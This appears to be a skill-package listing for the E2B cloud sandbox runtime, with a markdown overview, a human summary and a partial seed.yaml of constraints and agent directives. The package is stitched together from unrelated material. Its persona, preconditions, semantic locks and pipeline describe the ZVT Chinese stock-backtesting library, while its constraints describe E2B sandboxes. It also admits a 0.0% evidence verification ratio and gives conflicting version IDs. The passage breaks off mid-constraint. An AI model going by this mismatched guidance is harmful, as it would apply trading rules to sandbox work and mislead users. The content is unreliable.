Tang Weigang

@clawhub-tangweigang-jpg-8679fec286

82prompts

0upvotes received

0contributions

Joined 3 months ago

82 contributions in the last year

Aug

Sep

Oct

Nov

Dec

Jan

Feb

Mar

Apr

May

Jun

Jul

Less

E2b Sandbox Runtime

Skill

E2B：在隔离 micro-VM 里执行 AI 生成代码的云端 runtime。Python / TS SDK 通过 Connect-RPC 调用 envd 守护进程（Rust + protobuf）。 E2B: cloud-side runtime for executing AI-generated code...

---
name: e2b-sandbox-runtime
description: |-
  E2B：在隔离 micro-VM 里执行 AI 生成代码的云端 runtime。Python / TS SDK 通过 Connect-RPC 调用 envd 守护进程（Rust + protobuf）。
  E2B: cloud-side runtime for executing AI-generated code in isolated micro-VMs. Python and TypeScript SDKs are pure RPC clients over Connect-RPC against an envd daemon (Rust + protobuf).
license: MIT-0
compatibility: AI engineering knowledge skill — host AI consumes seed.yaml directly. No installation required.
metadata:
  version: "v0.1.0"
  blueprint_id: "finance-bp-141"
  blueprint_source: "e2b-dev/E2B"
  blueprint_commit: "557b723cc12f48af6c3657518a0b326b46ebff6d"
  category: ai-engineering
  doramagic_url: "https://doramagic.ai/zh/crystal/e2b-sandbox-runtime"
  openclaw:
    skillKey: e2b-sandbox-runtime
    category: ai-engineering
    primaryEnv: knowledge
---
# 这个 skill 适合什么用户？能做哪些任务？

## 概览

E2B 是在隔离 micro-VM 里执行 AI 生成代码的云端 runtime（github.com/e2b-dev/E2B）。Python / TypeScript SDK 是纯 RPC 客户端，通过 Connect-RPC 对接 envd 守护进程（Rust + protobuf，托管在独立的 e2b-dev/infra repo）。

SDK 接口为 2x2：{Sandbox, AsyncSandbox} × {Template, AsyncTemplate}。Sandbox / AsyncSandbox 各带四个子模块作为实例属性：files: Filesystem / comman...

**Doramagic 晶体页**: https://doramagic.ai/zh/crystal/e2b-sandbox-runtime

## 知识规模

- **42 条约束** (3 fatal + 39 non-fatal)
- 上游源码: `e2b-dev/E2B` @ commit `557b723c`
- 蓝图 ID: `finance-bp-141`

## 用法

Host AI（Claude Code / Cursor / OpenClaw）读 `references/seed.yaml`，按其中的：
- `intent_router` 匹配用户意图
- `architecture` 理解项目架构
- `constraints` 应用 anti-pattern 约束
- `business_decisions` 参考核心设计决策

## FAQ 摘要

### 这个 skill 适合什么用户？能做哪些任务？
适合需要让 LLM 安全执行任意代码的工程师：AI 助手跑 Python / shell、数据分析 sandbox、教学环境。每个 sandbox 是隔离 micro-VM，泄露面限制在单个 sandbox 内。Jupyter 内核 / 富输出场景应改用 e2b-code-interpreter。访问 doramagic.ai/r/e2b 查看完整用例。

### 需要准备什么环境？依赖什么？
Python 3.9+ 或 Node 18+。`E2B_API_KEY` 给 SDK runtime（创建 / 控制 sandbox）；`E2B_ACCESS_TOKEN` 给 CLI 鉴权（template build / dashboard）。可选 `E2B_DOMAIN`（默认 e2b.app）。出站 HTTPS 到 *.e2b.app。

### 会踩哪些坑？这个 skill 怎么防护？
本 skill 内置 42 条约束（3 条 fatal）。典型踩坑：(1) TS 用户忘 kill()——TS Sandbox 没有 Symbol.dispose 也没自动清理，sandbox 持续计费到超时；(2) 通过 envs={...} 传 API key 会被 commands.list() 泄露给持有 sandbox 句柄的人；

---

完整文档: 见 `references/seed.yaml` (v6.1 schema). 浏览页: https://doramagic.ai/zh/crystal/e2b-sandbox-runtime

FILE:human_summary.md
# finance-bp-141-v6.1 — Human Summary

**Persona**: Doraemon

> I help you build quant strategies on A-share with ZVT — from data fetch to backtest, one flow. Just tell me what you want; I'll write the code, you don't have to dig docs. (Heads up: ZVT natively supports A-share, HK, and crypto. US stocks — stockus_nasdaq_AAPL — are half-baked; don't bother for serious work.)

## What I Can Do

- File upload, edit, and watch for filesystem events
- Long-running background server with port exposure
- Run a one-off shell command and capture output
- A-share MACD daily golden-cross backtest with hfq price adjustment from eastmoney
- End-to-end ZVT pipeline: FinanceRecorder + GoodCompanyFactor + StockTrader
- Multi-factor strategy with TargetSelector (AND mode) combining MACD + volume breakout
- Index composition data collection (SZ1000, SZ2000) with EM recorder

## What I Auto-Fetch

- ZVT stage pipeline structure (data_collection → visualization) from LATEST.yaml
- Semantic locks (SL-01 through SL-12) — especially sell-before-buy ordering and MACD params
- Fatal constraints (finance-C-*) relevant to your target strategy type
- Default parameters: MACD(12,26,9), hfq adjustment, buy_cost=0.001, base_capital=1M CNY
- Entity ID format (stock_sh_600000) and DataFrame MultiIndex convention
- Provider-specific recorder class names and required class attributes

## What I Ask You

- Target market: A-share (default), HK, or crypto? (US stocks in ZVT are half-baked — stockus_nasdaq_AAPL exists but coverage is thin)
- Data source / provider: eastmoney (free, no account), joinquant (account+paid), baostock (free, good history), akshare, or qmt (broker)?
- Strategy type: MACD golden-cross, MA crossover, volume breakout, fundamental screen, or custom factor?
- Time range: start_timestamp and end_timestamp for backtest period
- Target entity IDs: specific stocks (stock_sh_600000) or index components (SZ1000)?

## Locale Rendering

**Instruction**: On first user contact, translate all fields above into detected user locale while preserving Doraemon persona (direct, frank, mildly snarky, knows limits).

**Preserve verbatim**: BD-IDs, SL-IDs, UC-IDs, finance-C-IDs, class_names, function_names, file_paths, numeric_thresholds

---

*Generated by compile_crystal_skeleton.py v5.0 for finance-bp-141-v6.1*
*All content is English source — agent translates on first user contact.*
FILE:references/seed.yaml
meta:
  id: finance-bp-141-v6.1
  version: v6.1
  blueprint_id: finance-bp-141
  sop_version: crystal-compilation-v6.1
  source_language: en
  compiled_at: '2026-04-25T09:19:04.568555+00:00'
  target_host: openclaw
  authoritative_artifact:
    primary: seed.yaml
    non_authoritative_derivatives:
    - SKILL.md (host-generated summary, may lag)
    - HEARTBEAT.md (host telemetry)
    - memory/*.md (host conversational memory)
    rule: On any behavioral decision (preconditions check, OV assertion, EQ rule firing, spec_lock verification), agents MUST
      re-read seed.yaml. Derivatives are for UI display only and may be out-of-date.
  execution_protocol:
    install_trigger:
    - Execute resources.host_adapter.install_recipes[] in declared order
    - Verify each package with import check before proceeding
    execute_trigger: When user intent matches intent_router.uc_entries[].positive_terms AND user uses action verb (run/execute/跑/执行/backtest/fetch/collect)
    on_execute:
    - Reload seed.yaml (do not rely on SKILL.md or cached summaries)
    - Run preconditions[] in declared order; halt on first fatal failure with on_fail message to user
    - Enter context_state_machine.CA1_MEMORY_CHECKED state
    - Evaluate evidence_quality.enforcement_rules[]; prepend user_disclosure_template
    - Translate user_facing_fields to user locale per locale_contract
    workspace_resolution:
      scripts_path: '{host_workspace}/scripts/'
      skills_path: '{host_workspace}/skills/'
      trace_path: '{host_workspace}/.trace/'
locale_contract:
  source_language: en
  user_facing_fields:
  - human_summary.what_i_can_do.tagline
  - human_summary.what_i_can_do.use_cases[]
  - human_summary.what_i_auto_fetch[]
  - human_summary.what_i_ask_you[]
  - evidence_quality.user_disclosure_template
  - post_install_notice.message_template.positioning
  - post_install_notice.message_template.capability_catalog.groups[].name
  - post_install_notice.message_template.capability_catalog.groups[].description
  - post_install_notice.message_template.capability_catalog.groups[].ucs[].name
  - post_install_notice.message_template.capability_catalog.groups[].ucs[].short_description
  - post_install_notice.message_template.call_to_action
  - post_install_notice.message_template.featured_entries[].beginner_prompt
  - post_install_notice.message_template.more_info_hint
  - preconditions[].description
  - preconditions[].on_fail
  - intent_router.uc_entries[].name
  - intent_router.uc_entries[].ambiguity_question
  - architecture.pipeline
  - architecture.stages[].narrative.does_what
  - architecture.stages[].narrative.key_decisions
  - architecture.stages[].narrative.common_pitfalls
  - constraints.fatal[].consequence
  - constraints.regular[].consequence
  - output_validator.assertions[].failure_message
  - acceptance.hard_gates[].on_fail
  - skill_crystallization.action
  locale_detection_order:
  - explicit_user_declaration
  - first_message_language
  - system_locale
  translation_enforcement:
    trigger: on_first_user_message
    action: Render user_facing_fields in detected locale, preserving all IDs (BD-/SL-/UC-/finance-C-) and code identifiers
      verbatim
    violation_code: LOCALE-01
    violation_signal: User receives untranslated English Human Summary when detected locale != en
evidence_quality:
  declared:
    evidence_coverage_ratio: null
    evidence_verify_ratio: null
    evidence_invalid: 0
    evidence_verified: null
    evidence_auto_fixed: null
    audit_coverage: 20 finance-universal not_applicable + 6 AIL not_applicable + 5 DAT not_applicable + 6 SANDBOX_RUNTIME
      fail = 37 items reviewed across applicable scope
    audit_pass_rate: 0/6 (0% of applicable items pass — 6 fail capture the architectural divergences and risk surfaces worth
      surfacing as constraints; this is normal for a high-leverage runtime BP where most checks find the documented anti-patterns)
    audit_fail_total: 0
    audit_finance_universal:
      pass: 0
      warn: 0
      fail: 0
    audit_subdomain_totals:
      pass: 0
      warn: 0
      fail: 0
  enforcement_rules:
  - id: EQ-01
    trigger: declared.evidence_verify_ratio < 0.5
    action: MUST invoke traceback lookup for all cited BD-IDs in output before emitting business code — read LATEST.yaml sections
      for each BD referenced
    violation_code: EQ-01-V
    violation_signal: Generated script references BD-IDs but no tool_call to read LATEST.yaml preceded code generation
  - id: EQ-02
    trigger: always
    action: MUST prepend user_disclosure_template (translated to user locale) to first user-facing response
    violation_code: EQ-02-V
    violation_signal: First agent response to user does not contain audit warning phrase
  user_disclosure_template: '[QUALITY NOTICE] This crystal was compiled from blueprint finance-bp-141. Evidence verify ratio
    = 0.0% and audit fail total = 0. Generated results may have uncaptured requirement gaps. Verify critical decisions against
    source files (LATEST.yaml / LATEST.jsonl).'
traceback:
  source_files:
    blueprint: LATEST.yaml
    constraints: LATEST.jsonl
  mandatory_lookup_scenarios:
  - id: TB-01
    condition: Two constraints have apparently conflicting enforcement rules
    lookup_target: LATEST.jsonl — find both constraint IDs, compare `consequence` + `evidence_refs` to determine priority
  - id: TB-02
    condition: A business decision rationale is unclear or disputed
    lookup_target: LATEST.yaml — locate BD-ID under business_decisions, read `rationale` + `alternative_considered` fields
  - id: TB-03
    condition: evidence_invalid > 0 in evidence_quality.declared
    lookup_target: LATEST.yaml _enrich_meta — cross-check specific BD `evidence_refs` fields for invalid markers
  - id: TB-04
    condition: User asks where a rule comes from
    lookup_target: LATEST.jsonl — find constraint by ID, read `confidence.evidence_refs` for source file + line number
  - id: TB-05
    condition: Generated code does not match expected ZVT API behavior
    lookup_target: LATEST.yaml stages[].required_methods — verify method signature and evidence locator in source code
  degraded_lookup:
    no_fs_access: 'Ask the user to paste the relevant LATEST.yaml section or LATEST.jsonl lines for the BD-/finance-C- IDs
      in question. Crystal ID: finance-bp-141-v5.0.'
trace_schema:
  event_types:
  - precondition_check
  - spec_lock_check
  - evidence_rule_fired
  - evidence_rule_skipped
  - locale_translation_emitted
  - hard_gate_passed
  - hard_gate_failed
  - skill_emitted
  - false_completion_claim
preconditions:
- id: PC-01
  description: zvt package installed and importable
  check_command: python3 -c 'import zvt; print(zvt.__version__)'
  on_fail: 'Run: python3 -m pip install zvt  then re-run: python3 -m zvt.init_dirs to initialize data directories'
  severity: fatal
- id: PC-02
  description: K-data exists for target entities (required before backtesting)
  check_command: python3 -c "from zvt.api.kdata import get_kdata; df = get_kdata(entity_ids=['stock_sh_600000'], limit=1);
    assert df is not None and len(df) > 0, 'No kdata found'"
  on_fail: 'Run recorder first: python3 -m zvt.recorders.em.em_stock_kdata_recorder --entity_ids stock_sh_600000  (replace
    with your target entity IDs)'
  severity: fatal
  applies_to_uc: []
- id: PC-03
  description: ZVT data directory initialized (~/.zvt or ZVT_HOME)
  check_command: 'python3 -c "import os; from pathlib import Path; zvt_home = Path(os.environ.get(''ZVT_HOME'', Path.home()
    / ''.zvt'')); assert zvt_home.exists(), f''ZVT home not found: {zvt_home}''"'
  on_fail: 'Run: python3 -m zvt.init_dirs'
  severity: fatal
- id: PC-04
  description: SQLite write permission for ZVT data directory
  check_command: python3 -c "import os, tempfile; from pathlib import Path; zvt_home = Path(os.environ.get('ZVT_HOME', Path.home()
    / '.zvt')); test_f = zvt_home / '.write_test'; test_f.touch(); test_f.unlink()"
  on_fail: 'Check directory permissions: chmod u+w ~/.zvt  or set ZVT_HOME environment variable to a writable location'
  severity: warn
intent_router:
  uc_entries:
  - uc_id: UC-001
    name: Run a one-off shell command and capture output
    positive_terms:
    - run
    - exec
    - shell
    - command
    - stdout
    data_domain: technical_demo
    negative_terms:
    - multi-step interactive REPL workflows (use Pty or e2b-code-interpreter)
    - workloads needing kernel state across calls (use e2b-code-interpreter)
  - uc_id: UC-002
    name: Long-running background server with port exposure
    positive_terms:
    - server
    - port
    - host
    - background
    - http.server
    data_domain: technical_demo
    negative_terms:
    - sub-300s sandboxes without explicit set_timeout
    - workloads that need stable persistent URL across sandbox restarts (URL is sandbox-scoped)
  - uc_id: UC-003
    name: File upload, edit, and watch for filesystem events
    positive_terms:
    - watch
    - filesystem
    - events
    - write
    - upload
    data_domain: technical_demo
    negative_terms:
    - very-high-frequency file events (no built-in coalescing)
  - uc_id: UC-004
    name: Egress firewalling via deny/allow lists
    positive_terms:
    - network
    - firewall
    - deny_out
    - allow_out
    - isolation
    data_domain: technical_demo
    negative_terms:
    - workloads requiring arbitrary outbound (e.g. pip install from PyPI)
  - uc_id: UC-005
    name: Pause and resume to preserve filesystem + RAM across reconnects
    positive_terms:
    - pause
    - resume
    - connect
    - snapshot
    - hibernate
    data_domain: technical_demo
    negative_terms:
    - users on free tier where snapshot retention may be limited
    - latency-critical first-request paths (wake-up cost)
  - uc_id: UC-006
    name: Auto-pause on timeout with auto-resume on first request
    positive_terms:
    - auto_pause
    - auto_resume
    - lifecycle
    - cost
    data_domain: technical_demo
    negative_terms:
    - latency-critical first-request paths
  - uc_id: UC-007
    name: Signed file URLs for browser/CDN-direct upload-download
    positive_terms:
    - signed url
    - download_url
    - upload_url
    - expiration
    data_domain: technical_demo
    negative_terms:
    - workloads that cannot share signed URLs (security policy forbidding URL distribution)
  - uc_id: UC-008
    name: 'MCP gateway: bridge sandbox to external MCP servers (GitHub, Slack, etc.)'
    positive_terms:
    - mcp
    - gateway
    - mcp_token
    - github mcp
    data_domain: technical_demo
    negative_terms:
    - workloads that don't use MCP protocol
  - uc_id: UC-009
    name: Mount persistent volume across sandbox lifecycles
    positive_terms:
    - volume
    - mount
    - persistent
    - volume_mounts
    data_domain: technical_demo
    negative_terms:
    - one-shot sandboxes with no shared state
context_state_machine:
  states:
  - id: CA1_MEMORY_CHECKED
    entry: Task started
    exit: All memory queries attempted and recorded; memory_unavailable set if failed
    timeout: 30s — skip memory, mark memory_unavailable=true, proceed to CA2
  - id: CA2_GAPS_FILLED
    entry: CA1 complete
    exit: 'All FATAL-priority required inputs answered: target market (A-share/HK/US), data source, time range, strategy type'
    timeout: NOT skippable — FATAL inputs MUST be user-answered before proceeding
  - id: CA3_PATH_SELECTED
    entry: CA2 complete
    exit: intent_router matched single use case with confidence gap > 20% over next candidate, no data_domain ambiguity
    timeout: Trigger ambiguity_question for top-2 candidates, await user selection
  - id: CA4_EXECUTING
    entry: CA3 complete + user explicit confirmation received
    exit: All hard gates G1-Gn passed and output files written
    timeout: NOT skippable — user confirmation of execution path required
  enforcement: Code generation is PROHIBITED before CA4_EXECUTING. Any regression to earlier state MUST be announced to user.
    buy/sell ordering SL-01 check runs at CA4 entry.
spec_lock_registry:
  semantic_locks:
  - id: SL-01
    description: Execute sell orders before buy orders in every trading cycle
    locked_value: sell() called before buy() in each Trader.run() iteration
    violation_is: fatal
    source_bd_ids:
    - BD-018
  - id: SL-02
    description: Trading signals MUST use next-bar execution (no look-ahead)
    locked_value: due_timestamp = happen_timestamp + level.to_second()
    violation_is: fatal
    source_bd_ids:
    - BD-014
    - BD-025
  - id: SL-03
    description: Entity IDs MUST follow format entity_type_exchange_code
    locked_value: stock_sh_600000 | stockhk_hk_0700 | stockus_nasdaq_AAPL
    violation_is: fatal
    source_bd_ids: []
  - id: SL-04
    description: DataFrame index MUST be MultiIndex (entity_id, timestamp)
    locked_value: df.index.names == ['entity_id', 'timestamp']
    violation_is: fatal
    source_bd_ids: []
  - id: SL-05
    description: 'TradingSignal MUST have EXACTLY ONE of: position_pct, order_money, order_amount'
    locked_value: XOR enforcement in trading/__init__.py:68
    violation_is: fatal
    source_bd_ids: []
  - id: SL-06
    description: 'filter_result column semantics: True=BUY, False=SELL, None/NaN=NO ACTION'
    locked_value: factor.py:475 order_type_flag mapping
    violation_is: fatal
    source_bd_ids: []
  - id: SL-07
    description: Transformer MUST run BEFORE Accumulator in factor pipeline
    locked_value: 'compute_result(): transform at :403 before accumulator at :409'
    violation_is: fatal
    source_bd_ids: []
  - id: SL-08
    description: 'MACD parameters locked: fast=12, slow=26, signal=9'
    locked_value: factors/algorithm.py:30 macd(slow=26, fast=12, n=9)
    violation_is: fatal
    source_bd_ids:
    - BD-036
  - id: SL-09
    description: 'Default transaction costs: buy_cost=0.001, sell_cost=0.001, slippage=0.001'
    locked_value: sim_account.py:25 SimAccountService default costs
    violation_is: warning
    source_bd_ids:
    - BD-029
  - id: SL-10
    description: A-share equity trading is T+1 (no same-day close of buy positions)
    locked_value: sim_account.available_long filters by trading_t
    violation_is: fatal
    source_bd_ids: []
  - id: SL-11
    description: Recorder subclass MUST define provider AND data_schema class attributes
    locked_value: contract/recorder.py:71 Meta; register_schema decorator
    violation_is: fatal
    source_bd_ids: []
  - id: SL-12
    description: Factor result_df MUST contain either 'filter_result' OR 'score_result' column
    locked_value: result_df.columns.intersection({'filter_result', 'score_result'}) non-empty
    violation_is: fatal
    source_bd_ids: []
  implementation_hints:
  - id: IH-01
    hint: 'Use AdjustType enum exactly: qfq (pre-adjust), hfq (post-adjust), bfq (none) — contract/__init__.py:121'
  - id: IH-02
    hint: For A-share kdata, default to hfq for long-term analysis (dividend-adjusted) — trader.py:538 StockTrader
  - id: IH-03
    hint: SQLite connection MUST use check_same_thread=False for multi-threaded recorders
  - id: IH-04
    hint: Accumulator state serialization uses JSON with custom encoder/decoder hooks — contract/base_service.py
  - id: IH-05
    hint: Factor.level MUST match TargetSelector.level (enforced at add_factor) — factors/target_selector.py:84
preservation_manifest:
  required_objects:
    business_decisions_count: 26
    fatal_constraints_count: 3
    non_fatal_constraints_count: 39
    use_cases_count: 9
    semantic_locks_count: 12
    preconditions_count: 4
    evidence_quality_rules_count: 2
    traceback_scenarios_count: 5
architecture:
  pipeline: data_collection -> data_storage -> factor_computation -> target_selection -> trading_execution -> visualization
  stages:
  - id: data_collection
    narrative:
      does_what: TimeSeriesDataRecorder and FixedCycleDataRecorder fetch OHLCV and fundamental data from providers (eastmoney,
        joinquant, baostock, akshare) and persist domain objects (Stock1dKdata, BalanceSheet) to SQLite via df_to_db().
      key_decisions: BD-002 chose evaluate_start_end_size_timestamps for incremental fetch (not full refresh) because comparing
        to get_latest_saved_record avoids redundant API calls; BD-003 chose get_data_map field transformation to keep domain
        schema provider-agnostic.
      common_pitfalls: 'Don''t forget SL-11: Recorder subclass MUST declare both provider and data_schema class attributes
        else initialization fails with assertion error; finance-C-001 fatal violation.'
    business_decisions: []
  - id: data_storage
    narrative:
      does_what: StorageBackend persists DataFrames to per-provider SQLite databases at {data_path}/{provider}/{provider}_{db_name}.db
        using path templates from _get_path_template; Mixin.record_data and Mixin.query_data provide uniform read/write interface.
      key_decisions: BD-004 chose StorageBackend abstraction (not hardcoded SQLite) to allow future cloud storage swap; BD-006
        derives db_name from data_schema __tablename__ for per-domain database isolation.
      common_pitfalls: SL-04 violation (wrong DataFrame index) causes factor pipeline failures downstream; always ensure df.index.names
        == ['entity_id', 'timestamp'] before calling record_data.
    business_decisions: []
  - id: factor_computation
    narrative:
      does_what: Factor.compute() applies Transformer (stateless, e.g. MacdTransformer) then Accumulator (stateful, e.g. MaStatsAccumulator)
        to produce filter_result or score_result columns; EntityStateService persists per-entity rolling state across batches.
      key_decisions: BD-007 chose Factor inheriting DataReader for composable data access; SL-08 locks MACD at (fast=12, slow=26,
        n=9) — chose standard Appel parameters not adaptive because interpretability matters for practitioners.
      common_pitfalls: 'SL-07: Transformer MUST run before Accumulator — swapping order causes NaN propagation; SL-12: result_df
        must contain filter_result OR score_result column or TargetSelector silently drops all signals.'
    business_decisions: []
  - id: target_selection
    narrative:
      does_what: TargetSelector.add_factor() registers Factor instances; get_targets() returns entity_ids passing threshold
        filter at a specific timestamp, enabling point-in-time historical backtesting without look-ahead.
      key_decisions: BD-012 chose registrable factor list (not hardcoded) for runtime customization; BD-013 chose timestamp-specific
        filtering not current-only because backtests need historical point-in-time correctness.
      common_pitfalls: Factor.level MUST match TargetSelector.level (IH-05); mismatched levels cause silent empty target lists
        that look like no signals but are actually level-mismatch bugs.
    business_decisions: []
  - id: trading_execution
    narrative:
      does_what: Trader.run() calls sell() before buy() each cycle, generates TradingSignals with due_timestamp = happen_timestamp
        + level.to_second() for next-bar execution, and applies on_profit_control() for stop-loss/take-profit before regular
        target selection.
      key_decisions: SL-01 locks sell-before-buy order because available_long check in sim_account depends on it — chose this
        over symmetric ordering to prevent implicit leverage; BD-039 chose long=AND/short=OR multi-level logic to reflect
        risk asymmetry.
      common_pitfalls: 'SL-02 violation (immediate execution instead of next-bar) introduces look-ahead bias and makes backtest
        results unreproducible in live trading; SL-10: A-share T+1 constraint — backtesting without it overstates returns.'
    business_decisions: []
  - id: visualization
    narrative:
      does_what: Drawer.draw() combines kline main chart with factor overlays and Rect annotations for entry/exit signals
        using Plotly; Drawable interface on Factor enables consistent chart rendering across data types.
      key_decisions: BD-019 chose drawer_rects subclass override for custom annotations not hardcoded markers — allows traders
        to define entry/exit visuals without modifying base drawing logic.
      common_pitfalls: draw_result=True by default (BD-055) is fine for development but set draw_result=False in production/headless
        environments to avoid Plotly server startup overhead.
    business_decisions: []
  - id: cross_cutting_concerns
    narrative:
      does_what: 'Invariants and utilities that span multiple pipeline stages — collected from 6 source groups: cross_cutting(6),
        filesystem_ops(3), git(1), network_port_forwarding(1), process_management(3), sandbox_lifecycle(12).'
      key_decisions: 26 BDs merged here because they apply to more than one main stage (e.g. algorithm helpers, default value
        choices, ordering contracts, error handling). Agent should inspect individual BD summaries and link back to affected
        main stages via shared IDs.
      common_pitfalls: Cross-cutting concerns frequently surface as bugs when changes to one main stage unintentionally break
        another. Check constraints referencing these BDs and verify invariants still hold after any stage-local modification.
    business_decisions:
    - id: BD-021
      type: missing
      summary: No automatic redaction of `envs` containing common secret patterns (`*_API_KEY`, `*_TOKEN`)
    - id: BD-022
      type: missing
      summary: No JS auto-cleanup (`Symbol.dispose` not implemented in Sandbox class)
    - id: BD-023
      type: missing
      summary: '`request_timeout` default of 60s applied uniformly to file uploads — no payload-size heuristic'
    - id: BD-024
      type: missing
      summary: '`commands.kill` is SIGKILL-only via SDK public API (W3 — SIGTERM exists in wire protocol but is not exposed)'
    - id: BD-025
      type: missing
      summary: No client-side concurrency throttle / no exposed `team.quota` introspection before `create()`
    - id: BD-026
      type: missing
      summary: 'No warning when MCP gateway started with `user="root"` and `envs={"GATEWAY_ACCESS_TOKEN": ...}` (token visible
        in `commands.list()` post-start)'
    - id: BD-006
      type: B
      summary: Default `REQUEST_TIMEOUT = 60.0` seconds for ALL HTTP calls including files.write
    - id: BD-013
      type: T
      summary: Octet-stream upload requires recent envd; older envd falls back to multipart
    - id: BD-014
      type: B
      summary: Recursive watch_dir requires recent envd, raises TemplateException on older envd
    - id: BD-010
      type: B
      summary: Git credentials embedded in URL netloc via `with_credentials(url, user, pwd)`
    - id: BD-004
      type: B/BA
      summary: Default `allow_internet_access=True`
    - id: BD-005
      type: B/BA
      summary: Default command `timeout=60` seconds in commands.run()
    - id: BD-007
      type: B
      summary: All commands wrapped in `/bin/bash -l -c <cmd>`
    - id: BD-008
      type: B
      summary: commands.kill() exposes ONLY SIGKILL (W3 corrected — SDK does not expose SIGTERM, NOT "no graceful term option")
    - id: BD-001
      type: B/BA
      summary: Default `default_sandbox_timeout = 300` (5 min) at sandbox-create time
    - id: BD-002
      type: B/BA
      summary: Default `auto_pause=False` hardcoded in Sandbox.create() (timeout = KILL not PAUSE)
    - id: BD-003
      type: B
      summary: Default `secure=True` — envd requires `X-Access-Token` header on every call
    - id: BD-009
      type: B/BA
      summary: '`envs` from `Sandbox.create(envs={...})` propagated raw to sandbox env, exposed via `commands.list()` — leaks
        under W5 threat model (sandbox-handle/credential holder, NOT "anyone on the internet")'
    - id: BD-011
      type: B
      summary: TS Sandbox has NO Symbol.dispose; Python has __exit__ — cross-SDK divergence in auto-cleanup (W4 — actual surface
        is 2x2 {Sandbox, AsyncSandbox} x {Template, AsyncTemplate})
    - id: BD-012
      type: T
      summary: Time units — Python in seconds, TS in milliseconds
    - id: BD-015
      type: B
      summary: Default sandbox template = "base"; with mcp= passed, default switches to "mcp-gateway"
    - id: BD-016
      type: RC
      summary: Maximum sandbox lifetime — 24h Pro tier / 1h Hobby tier
    - id: BD-017
      type: RC
      summary: Concurrent-sandbox quota tracked at team level (server-side cap)
    - id: BD-018
      type: T
      summary: Rate-limit returns 429 -> `SandboxException` for envd; `RateLimitException` for control plane (INCONSISTENT
        typing)
    - id: BD-019
      type: B
      summary: '`connect()` transparently resumes paused sandbox'
    - id: BD-020
      type: B
      summary: Snapshots persist beyond sandbox deletion; pause does not
resources:
  packages:
  - name: e2b (Python SDK package)
    version_pin: latest
  strategy_scaffold:
    entry_point_name: run_backtest
    output_path: result.csv
    execution_mode: backtest
    conditional_entry_points:
      backtest:
        entry_point_name: run_backtest
        output_path: result.csv
      collector:
        entry_point_name: run_collector
        output_path: result.json
      factor:
        entry_point_name: run_factor
        output_path: result.parquet
      training:
        entry_point_name: run_training
        output_path: result.json
      serving:
        entry_point_name: run_server
        output_path: result.json
      research:
        entry_point_name: run_research
        output_path: result.json
    tail_template: "# === DO NOT MODIFY BELOW THIS LINE ===\nif __name__ == \"__main__\":\n    result = run_backtest()  #\
      \ implement above\n    from validate import enforce_validation\n    enforce_validation(result, output_path=\"{workspace}/result.csv\"\
      )\n# === END DO NOT MODIFY ==="
  host_adapter:
    target: openclaw
    timeout_seconds: 1800
    shell_operator_restriction: 'exec tool intercepts && / ; / | — never chain: ''pip install X && python Y''. Use separate
      exec calls.'
    install_recipes:
    - python3 -m pip install e2b (Python SDK package)
    - python3 -m pip install zvt
    credential_injection: JoinQuant/QMT credentials require user-side '!' prefix shell login. Never hardcode credentials in
      generated scripts.
    path_resolution: '{workspace} resolves to ~/.openclaw/workspace/doramagic at execution time.'
    file_io_tooling: Use openclaw 'write' tool for .py/.sql files; 'exec' tool for python3 /absolute/path/script.py (absolute
      paths only).
constraints:
  fatal:
  - id: e2b-C-001
    when: Writing TypeScript SDK code that calls Sandbox (any e2b npm package consumer scenario).
    action: Wrap each Sandbox.create() in try/finally and `await sandbox.kill()` in the finally block — the TS Sandbox class
      does NOT implement Symbol.dispose / Symbol.asyncDispose, so a `using` block does not auto-cleanup.
    severity: fatal
    kind: domain_rule
    modality: must
    consequence: If a TS caller misses `await sandbox.kill()`, the sandbox keeps billing until the 5-minute default timeout
      reclaims it server-side; every leak adds up to 5 minutes of billable time, and long loops or exception paths multiply
      cost.
    derived_from_bd_id: pitfall-001
  - id: e2b-C-004
    when: Implementing a stateful agent loop that needs to retain in-sandbox filesystem/process/RAM state across multiple
      conversation turns.
    action: 'Pass lifecycle={''on_timeout'': ''pause'', ''auto_resume'': True} explicitly to Sandbox.create() — omitting it
      equals auto_pause=False (hard-coded at main.py:219), and on timeout the sandbox is KILLED and all state is lost.'
    severity: fatal
    kind: domain_rule
    modality: must
    consequence: Without a lifecycle config, the sandbox is destroyed at timeout, all filesystem/process/RAM state is lost,
      the next connect() hits a deleted sandbox raising SandboxNotFoundException, and the agent's multi-turn context chain
      breaks.
    stage_ids:
    - sandbox_lifecycle
    derived_from_bd_id: pitfall-004
  - id: e2b-C-026
    when: Planning the maximum duration of a single sandbox task / picking an E2B tier.
    action: Do NOT let a single Sandbox task run beyond the tier cap — Hobby tier hard cap is 1h, Pro tier is 24h, enforced
      server-side; the platform KILLs the sandbox regardless of any timeout the SDK passes.
    severity: fatal
    kind: domain_rule
    modality: must_not
    consequence: Exceeding 1h on Hobby kills the task at 1h and loses all in-memory state; if the caller has no progress checkpoint,
      the entire task rolls back. The same applies to 24h on Pro.
    stage_ids:
    - sandbox_lifecycle
    derived_from_bd_id: BD-016
  regular:
  - id: e2b-C-002
    when: Implementing a Sandbox.create() call that needs to inject credentials or API keys into in-sandbox processes.
    action: Do NOT stuff API keys, tokens, or other sensitive values into the envs={...} parameter — the SDK does no redaction,
      envs flows verbatim into NewSandbox(env_vars=...) and is exposed via commands.list() to anyone holding an envd access
      token (downstream services, CI runners, colleagues with the sandbox_id).
    severity: high
    kind: domain_rule
    modality: must_not
    consequence: An API key placed in envs is exposed as os.environ inside the sandbox to AI-generated code, and is visible
      in the ProcessInfo.envs field returned by commands.list() to anyone with envd access — effectively plaintext credential
      leakage to any sandbox-handle holder.
    stage_ids:
    - sandbox_lifecycle
    - process_management
    derived_from_bd_id: pitfall-002
  - id: e2b-C-003
    when: Calling sandbox.files.write() to upload files or sandbox.commands.run() to execute commands (Python side), where
      the file is > ~10MB or the network is slow.
    action: Pass an explicit request_timeout=N (seconds) to each files.write call, or switch to download_url/upload_url signed-URL
      transport — the default REQUEST_TIMEOUT=60 seconds is passed straight through and large/slow uploads will time out.
    severity: high
    kind: resource_boundary
    modality: must
    consequence: When files.write hits the default 60-second cap mid-upload, httpx raises a generic ReadTimeout that does
      not distinguish timeout from transport error; callers think the upload succeeded while the in-sandbox file is incomplete
      or absent, and downstream readers process empty/truncated files.
    stage_ids:
    - filesystem_ops
    derived_from_bd_id: pitfall-003
  - id: e2b-C-005
    when: Implementing a workload that needs Jupyter kernel state, rich output (matplotlib figures, HTML, cross-call kernel
      state).
    action: Do NOT build Jupyter-like capabilities on top of this repo's commands.run() — commands.run() is a bare /bin/bash
